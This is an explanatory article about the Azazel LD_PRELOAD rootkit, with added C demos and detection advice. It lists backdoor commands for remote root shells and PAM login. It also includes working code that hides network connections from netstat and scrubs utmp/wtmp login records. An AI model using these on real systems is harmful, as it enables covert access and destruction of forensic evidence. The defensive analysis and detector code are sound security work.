You may have heard of the Jynx and Jynx2 rootkits. These are so-called userland rootkits: they rely on the LD_PRELOAD mechanism, which makes the dynamic linker load the listed libraries before any others, so the functions such a library exports shadow the same-named functions in libc for every dynamically linked program that is started. They are already fairly old, but still work well.
Two days ago, GitHub user Chokepoint published a rootkit called Azazel. It is based on the Jynx source code and adds a number of new features:
- Anti-debugging mechanisms
- Hiding from unhide, lsof, ps, ldd
- Hiding files and directories
- Hiding remote connections
- Hiding processes
- Hiding logins
- Hiding from local traffic sniffing via PCAP
- Two backdoors giving a full shell (with a PTY):
- - Crypthook accept() backdoor
- - Plain accept() backdoor
- PAM backdoor: authenticate as any user
- Clearing utmp/wtmp records for the PTY
- XOR obfuscation of the strings in the compiled library
Let's look at them in detail.
Hiding ports
Azazel can hide connections from programs like netstat, ss and lsof. It hides connections whose ports fall into ranges set in its configuration. By default, ports 61040-61050 are used for the plaintext backdoor and 61051-61060 for Crypthook (a library that hooks send/sendto/recv/recvfrom and encrypts/decrypts the traffic on the fly). For a connection to be hidden, the client's source port must fall into one of these ranges, so you can connect from any machine; you only need to choose a source port from the range:
$ ncat target 22 -p 61040
changeme
Welcome! Here's a shell.
root@host:/root#
$ LD_PRELOAD=./crypthook.so ncat localhost 22 -p 61051
changeme
Welcome! Here's a shell.
root@host:/root/#
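To make the mechanism concrete, here is an added example (written for this page, not Azazel's or Crypthook's code) of the filter that port hiding needs: netstat, ss and lsof read the connection tables from /proc/net/tcp and /proc/net/tcp6, so a preloaded hook on the file-open routine can hand them a filtered temporary copy instead of the real file. The port ranges are the defaults quoted above; the /proc/net/tcp lines are constructed for the demo.

```c
/* Added example, not Azazel's code: how a /proc/net/tcp filter hides
 * connections by port range. netstat/ss/lsof get their connection list from
 * /proc/net/tcp{,6}; a preloaded hook on fopen() can hand them a filtered
 * copy instead. Ranges mirror the defaults quoted in the text; the sample
 * lines below are constructed for the demo. */
#include <stdio.h>
#include <string.h>

#define LOW_PORT  61040   /* plaintext backdoor: 61040-61050 */
#define HIGH_PORT 61060   /* crypthook backdoor: 61051-61060 */

/* 1 if either endpoint port of this /proc/net/tcp line falls in the hidden
 * range. The header line and malformed lines are never hidden. */
int procnet_line_hidden(const char *line)
{
    unsigned lport, rport;
    /* "sl: LOCALHEX:PORTHEX REMHEX:PORTHEX ..."; %*[...] skips the address,
     * so IPv4 (8 hex digits) and IPv6 (32 hex digits) both parse */
    if (sscanf(line, " %*d: %*[0-9A-Fa-f]:%x %*[0-9A-Fa-f]:%x",
               &lport, &rport) != 2)
        return 0;
    return (lport >= LOW_PORT && lport <= HIGH_PORT) ||
           (rport >= LOW_PORT && rport <= HIGH_PORT);
}

/* Copy 'in' to a fresh tmpfile() minus hidden lines; this is what a hooked
 * fopen("/proc/net/tcp") would return to netstat instead of the real file.
 * Returns the filtered stream (rewound) or NULL on error. */
FILE *procnet_filtered_copy(FILE *in)
{
    FILE *out = tmpfile();
    char line[512];
    if (!out)
        return NULL;
    while (fgets(line, sizeof line, in))
        if (!procnet_line_hidden(line))
            fputs(line, out);
    rewind(out);
    return out;
}

/* Constructed sample: sshd listening on :22, a normal client on :22 from
 * 10.0.0.5:54321 (0xD431), and a backdoor client from 10.0.0.5 with source
 * port 0xEE70 = 61040. Only the last line should disappear. */
static const char sample_procnet[] =
    "  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode\n"
    "   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1001 1 0 100 0 0 10 0\n"
    "   1: 0100000A:0016 0500000A:D431 01 00000000:00000000 00:00000000 00000000     0        0 1002 1 0 20 4 30 10 -1\n"
    "   2: 0100000A:0016 0500000A:EE70 01 00000000:00000000 00:00000000 00000000     0        0 1003 1 0 20 4 30 10 -1\n";

/* Run the filter over the sample; returns how many lines survive. */
int demo_visible_lines(void)
{
    FILE *in = tmpfile(), *out;
    char buf[512];
    int n = 0;
    if (!in)
        return -1;
    fputs(sample_procnet, in);
    rewind(in);
    out = procnet_filtered_copy(in);
    fclose(in);
    if (!out)
        return -1;
    while (fgets(buf, sizeof buf, out))
        n++;
    fclose(out);
    return n;   /* header + listening socket + normal client = 3 */
}

int main(void)
{
    printf("%d of 4 lines visible after filtering\n", demo_visible_lines());
    return 0;
}
```

Two practical consequences for defenders: the filter only ever alters the local /proc view, so the same connection is fully visible to a firewall, an IDS or netstat on the far end, and if the attacker kept the default ranges, those ports are themselves a signature worth alerting on.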
PAM backdoor
Perhaps the most interesting feature. As you know, a large number of modern programs (sshd, su, login, sudo) authenticate users through PAM. If we can interfere with PAM authentication, we can log in as any user on the system. Azazel does not install a PAM module of its own; it hooks the existing libpam calls these programs make (pam_authenticate() and friends), so the hooked calls report success for the backdoor user.
$ make client
$ LD_PRELOAD=./client.so ssh rootme@localhost
root@host:/
$ su - rootme
Clearing wtmp / utmp
When a user logs in on a PTY, the session is recorded in utmp (the currently logged-in users, which is what w and who read) and wtmp (the login/logout history, which is what last reads). Azazel can scrub these records either automatically, for its own port backdoors, or manually when automatic cleanup is impossible (for example, a login through the PAM backdoor over ssh). The manual cleanup is triggered by an environment variable, CLEANUP_LOGS, which any program the library is loaded into (here a harmless ls) acts on:
$ w | grep pts/16
root     pts/16   :0.0   Wed16   2:33m  0.16s  0.16s bash
$ CLEANUP_LOGS="pts/16" ls
utmp logs cleaned up.
wtmp logs cleaned up.
$ w | grep pts/16
$
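As an added example (my code, not Azazel's), this is what a utmp/wtmp cleanup for one terminal has to do: both files are flat arrays of struct utmp records, so removing a session means rewriting the file without every record whose ut_line names that terminal. The records are constructed and written to a temporary file rather than /var/run/utmp or /var/log/wtmp.

```c
/* Added example, not Azazel's code: what "clearing utmp/wtmp for a PTY"
 * amounts to. utmp and wtmp are flat arrays of struct utmp records, so
 * removing a session means rewriting the file without every record whose
 * ut_line names that terminal. Records are constructed for the demo. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <utmp.h>

/* Drop every record whose ut_line equals 'line' from the utmp-format file
 * at 'path' and truncate it to what remains. Returns the number of records
 * removed, or -1 on error. */
int scrub_utmp_line(const char *path, const char *line)
{
    FILE *f = fopen(path, "r+b");
    struct utmp rec, *keep = NULL, *grown;
    size_t total = 0, kept = 0;
    int ok;

    if (!f)
        return -1;
    while (fread(&rec, sizeof rec, 1, f) == 1) {
        total++;
        if (strncmp(rec.ut_line, line, sizeof rec.ut_line) == 0)
            continue;                         /* this record goes */
        grown = realloc(keep, (kept + 1) * sizeof *keep);
        if (!grown) { free(keep); fclose(f); return -1; }
        keep = grown;
        keep[kept++] = rec;
    }
    rewind(f);                                /* rewrite in place, then cut */
    ok = (kept == 0 || fwrite(keep, sizeof *keep, kept, f) == kept)
      && fflush(f) == 0
      && ftruncate(fileno(f), (off_t)(kept * sizeof *keep)) == 0;
    free(keep);
    fclose(f);
    return ok ? (int)(total - kept) : -1;
}

/* Number of records in a utmp-format file, or -1 on error. */
int count_utmp_records(const char *path)
{
    FILE *f = fopen(path, "rb");
    struct utmp rec;
    int n = 0;
    if (!f)
        return -1;
    while (fread(&rec, sizeof rec, 1, f) == 1)
        n++;
    fclose(f);
    return n;
}

/* Build one constructed record (pid is arbitrary). */
static struct utmp make_record(short type, const char *user, const char *line)
{
    struct utmp r;
    memset(&r, 0, sizeof r);
    r.ut_type = type;
    r.ut_pid = 4242;
    strncpy(r.ut_user, user, sizeof r.ut_user - 1);
    strncpy(r.ut_line, line, sizeof r.ut_line - 1);
    return r;
}

/* Demo: a constructed wtmp-style history of four records (login and logout
 * on pts/16 plus two unrelated sessions), scrubbed for pts/16. Returns the
 * records left (expected 2), or -1 if exactly two were not removed. */
int demo_scrub_pts16(void)
{
    char path[] = "/tmp/utmpdemo.XXXXXX";
    struct utmp recs[4];
    FILE *f;
    int fd = mkstemp(path), removed, left;
    if (fd < 0)
        return -1;
    close(fd);
    recs[0] = make_record(USER_PROCESS, "root",  "pts/16");
    recs[1] = make_record(USER_PROCESS, "alice", "pts/3");
    recs[2] = make_record(DEAD_PROCESS, "",      "pts/16");
    recs[3] = make_record(USER_PROCESS, "bob",   "tty1");
    if (!(f = fopen(path, "wb")))
        return -1;
    fwrite(recs, sizeof recs[0], 4, f);
    fclose(f);
    removed = scrub_utmp_line(path, "pts/16");
    left = count_utmp_records(path);
    unlink(path);
    return removed == 2 ? left : -1;
}

int main(void)
{
    printf("records left after scrubbing pts/16: %d\n", demo_scrub_pts16());
    return 0;
}
```

Note what such a cleanup does not touch: lastlog, btmp, the sshd messages in the syslog/auth log and process accounting, if enabled, still record the session. For an ssh login through the PAM backdoor, sshd's own log lines are the obvious leftover trace.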
Anti debugging
Nothing sophisticated here: ptrace() is hooked and simply returns -1, so an attempt to attach to an infected process with strace or gdb fails.
$ strace -p $PPID
Don't scratch the walls
Hiding files and directories
Jynx could already hide any files belonging to a specific UID or GID. The hook sits in readdir()/readdir64(): entries owned by the magic ID are dropped from directory listings, while open(), read() and write() are left untouched, so such files can still be used if you know their names; you just never see them in a listing.
Hiding processes
Azazel hides processes owned by a specific GID or UID in the same way as files: ps, top and friends list processes by reading /proc, so hiding a process comes down to hiding its /proc/<pid> directory from readdir(). But sometimes you need to see the hidden files and processes yourself; for that there is an environment variable, HIDE_THIS_SHELL by default, which marks the process it is set for as the rootkit owner's:
$ env HIDE_THIS_SHELL=plz ncat -l -p 61061
Hiding from ldd / unhide
Azazel hides from ldd and unhide simply by not installing itself into those programs: when the library finds it has been loaded into one of them, it stays inactive. Unsophisticated, but quite effective.
Obfuscation of lines
If we looked at the strings in the Jynx and Jynx2 libraries, for example with strings, we would quickly see that this is some kind of malicious library. Azazel simply XORs all of its strings at build time and decodes them at runtime, so strings shows nothing meaningful.
Protecting against this type of rootkit is rather difficult. They are not detected by utilities like rkhunter and chkrootkit. At the moment there is one known way to check for function interception: compare where a libc function such as readdir() or fopen() actually resolves in a running process (via dlsym()/dladdr()) with its address inside libc itself. But in theory it is entirely possible to hook the functions of libdl.so as well, and then nothing but a LiveCD and your own brains will help.
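An added example of a check along these lines (written for this page, not taken from rkhunter, chkrootkit or the article): it inspects the process's own memory map for executable mappings of files outside the system library directories, and checks the two injection points, LD_PRELOAD and /etc/ld.so.preload. The set of trusted directories is an assumption to adjust per distribution; the maps excerpt used by the demo is constructed.

```c
/* Added example, not from the article or any existing tool: a first-pass
 * check for an LD_PRELOAD-style library in the running process. It flags
 * executable file mappings in /proc/self/maps outside the system library
 * directories and reports the two injection points, LD_PRELOAD and
 * /etc/ld.so.preload. Trusted prefixes are an assumption to tune per
 * distribution; the maps text used by the demo is constructed. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

static const char *trusted[] = { "/lib/", "/lib64/", "/usr/lib/", "/usr/lib64/", "/usr/local/lib/", NULL };

/* 1 if the maps line is an executable mapping of a file outside the trusted
 * directories and not the program binary itself, else 0. */
int maps_line_suspicious(const char *line, const char *self_exe)
{
    char perms[8], path[4096];
    const char **p;
    /* fields: address perms offset dev inode [pathname] */
    if (sscanf(line, "%*s %7s %*s %*s %*s %4095s", perms, path) != 2)
        return 0;                           /* anonymous mapping, no path */
    if (path[0] != '/' || !strchr(perms, 'x'))
        return 0;                           /* [stack], [vdso], data pages */
    if (self_exe && strcmp(path, self_exe) == 0)
        return 0;
    for (p = trusted; *p; p++)
        if (strncmp(path, *p, strlen(*p)) == 0)
            return 0;
    return 1;
}

/* Run the line check over a whole maps text; returns the number of hits. */
int count_suspicious_maps(const char *text, const char *self_exe)
{
    char line[4700];
    int found = 0;
    while (*text) {
        const char *nl = strchr(text, '\n');
        size_t len = nl ? (size_t)(nl - text) : strlen(text);
        if (len >= sizeof line)
            len = sizeof line - 1;
        memcpy(line, text, len);
        line[len] = '\0';
        found += maps_line_suspicious(line, self_exe);
        text = nl ? nl + 1 : text + strlen(text);
    }
    return found;
}

/* Same check on this process (first 64 KiB of maps); -1 if unreadable.
 * Limit: a rootkit hooking fopen()/read() can serve a cleaned copy, so a
 * serious checker is linked statically and reads via raw syscalls. */
int scan_self_maps(void)
{
    static char buf[1 << 16];
    char exe[4096];
    ssize_t n = readlink("/proc/self/exe", exe, sizeof exe - 1);
    FILE *f = fopen("/proc/self/maps", "r");
    size_t got;
    if (!f)
        return -1;
    got = fread(buf, 1, sizeof buf - 1, f);
    fclose(f);
    buf[got] = '\0';
    exe[n > 0 ? n : 0] = '\0';
    return count_suspicious_maps(buf, n > 0 ? exe : NULL);
}

/* Bitmask: 1 = LD_PRELOAD set for this process, 2 = /etc/ld.so.preload
 * exists and is not empty. */
int preload_indicators(void)
{
    const char *env = getenv("LD_PRELOAD");
    FILE *f = fopen("/etc/ld.so.preload", "r");
    int flags = (env && *env) ? 1 : 0;
    if (f) {
        if (fgetc(f) != EOF)
            flags |= 2;
        fclose(f);
    }
    return flags;
}

/* Constructed maps excerpt: the binary, libc, a library loaded from a
 * world-writable directory (the one that should be flagged), stack, vdso. */
static const char sample_maps[] =
    "55d1c0a01000-55d1c0a20000 r-xp 00001000 08:01 393221 /usr/bin/ls\n"
    "7f3a12000000-7f3a12020000 r--p 00000000 08:01 131078 /usr/lib/x86_64-linux-gnu/libc.so.6\n"
    "7f3a12020000-7f3a121a0000 r-xp 00020000 08:01 131078 /usr/lib/x86_64-linux-gnu/libc.so.6\n"
    "7f3a12400000-7f3a12410000 r-xp 00001000 08:01 655371 /dev/shm/.x/libhook.so\n"
    "7ffd5c000000-7ffd5c021000 rw-p 00000000 00:00 0 [stack]\n"
    "7ffd5c0fe000-7ffd5c100000 r-xp 00000000 00:00 0 [vdso]\n";

int main(void)
{
    printf("sample: %d suspicious mapping(s)\n", count_suspicious_maps(sample_maps, "/usr/bin/ls"));
    printf("self: %d suspicious, preload indicators %d\n", scan_self_maps(), preload_indicators());
    return 0;
}
```

Its limit is the one the article names: the check runs inside a process that may already be hooked, and a rootkit that intercepts the file-open and read routines can serve a clean maps file or an empty ld.so.preload. Link the checker statically so no preload applies to it, read the files through raw syscalls, and compare against a known-good listing taken from a LiveCD when in doubt.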
Take care of your machines.